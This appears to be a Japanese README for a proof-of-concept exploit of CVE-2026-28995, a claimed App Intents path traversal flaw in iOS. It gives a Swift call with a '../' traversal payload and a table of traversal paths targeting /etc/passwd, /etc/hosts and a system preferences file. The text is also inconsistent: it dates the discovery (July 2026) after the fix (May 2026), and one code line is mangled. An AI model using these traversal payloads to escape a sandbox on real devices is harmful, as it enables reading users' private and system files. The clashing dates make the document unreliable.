
# CVE-2026-28995 CVE-2026-28995の概念実証 — App Intentsにおけるパストラバーサル脆弱性(iOS 26.4.2以前)
CVE-2026-28995の概念実証 — iOS 26.4.2以下におけるApp Intentsのパストラバーサル脆弱性。
この脆弱性により、悪意のあるアプリがApp Intentsを介してサンドボックス外の任意のファイルを読み取ることができます。根本原因は、AppleのApp Intentsフレームワークにおける不十分なパス検証です。
影響を受けるバージョン: iOS 26.4.2以下
修正バージョン: iOS 26.5 (2026年5月11日)
readCve(path: String) -> Stringlet intent = CVE_2026_28995()
let content = intent.readCve(path: "../../../../../../../../../../../../../etc/passwd")
print(content)
パス 読み取り内容 ../../../../../../../../../../../../../etc/passwd ユーザーパスワード ../../../../../../../../../../../../../etc/hosts ホストファイル ../../../../../../../../../../../../../var/mobile/Library/Preferences/.GlobalPreferences.plist システム環境設定
パスがディレクトリを指している場合、関数は以下を返します:
[DIRECTORY]
Contents:
file1.txt
file2.jpg
folder/
実行方法
readCve(path:)を呼び出します。責任ある開示
発見: 2026年7月1日 修正: iOS 26.5 (2026年5月11日)